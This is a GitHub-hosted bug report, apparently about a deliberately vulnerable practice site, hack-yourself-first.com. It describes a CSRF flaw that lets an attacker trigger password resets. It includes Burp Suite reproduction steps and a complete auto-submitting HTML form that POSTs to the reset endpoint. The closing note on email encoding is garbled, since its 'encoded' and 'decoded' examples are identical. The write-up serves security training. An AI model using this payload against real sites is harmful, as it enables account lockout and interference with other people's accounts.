-
Notifications
You must be signed in to change notification settings - Fork 2
Expand file tree
/
Copy path#20 Reset password using CSRF
More file actions
30 lines (22 loc) · 1.6 KB
/
#20 Reset password using CSRF
File metadata and controls
30 lines (22 loc) · 1.6 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
#20 Reset password using CSRF
Summary: CSRF (Cross-Site Request Forgery) makes an attacker to reset password of the victim
Steps to reproduce: Create an account and logoff. Go to login page and go to forgot password, enter email and click reset. Now capture the request in burp. Then right click on the request, click on engagement tools, and Generate CSRF PoC. In options, enable Include auto-submit script, and click Regenerate and copy the code and drop the request. Now, create a HTML file in your system and paste the copied CSRF PoC and save and run the file. Now you can see that it says "Your password has now been reset, you should receive an email with a new one shortly." This similar to #14 and #15 but with different attack method.
Impact: Due to this bug, an attacker can reset password of a legit user without their knowledge, and here most of the users created account using fake email. So it will cause permanent account lockout.
If you do not have Burpsuite pro, then here is the CSRF PoC:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://hack-yourself-first.com/Account/ResetPassword" method="POST">
<input type="hidden" name="Email" value="email@email.$email" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
update $email and with their respective ones,
"@" is "@" symbol
"." is "."
For example, if your email is "example@hacker.com", then your email will look like this : "example@hacker.com",
but it will be decoded to "example@hacker.com".